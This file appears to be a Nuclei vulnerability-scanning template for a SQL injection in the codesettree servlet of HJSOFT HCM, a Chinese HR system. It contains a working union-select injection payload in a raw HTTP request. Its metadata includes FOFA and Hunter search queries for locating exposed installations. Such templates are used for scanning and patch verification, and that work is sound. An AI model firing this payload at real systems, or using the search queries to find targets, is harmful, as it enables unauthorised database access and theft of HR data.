id: HJSOFT-HCM-sql-codesettree

info:
  name: HJSOFT-HCM-upload-codesettree
  author: p1z
  severity: critical
  description: |
    宏景人力资源信息管理系统 codesettree 文件sql注入漏洞
  reference:
    - https://github.com/ibaiw/2023Hvv/blob/main/%E5%AE%8F%E6%99%AF%20HCM%20codesettree%20SQL%20%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
  metadata:
    fofa-query: app="HJSOFT-HCM"
    hunter-query: app.name="宏景 HCM"
    verified: true
  tags: 2023,HJSOFT,HCM,sql


requests:
  - raw:
      - |
        GET /servlet/codesettree?categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d&codesetid=1&flag=c&parentid=-1&status=1 HTTP/1.1
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko) 5bGx5rW35LmL5YWz
        Accept-Encoding: gzip, deflate
        Connection: close
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - 'SQL'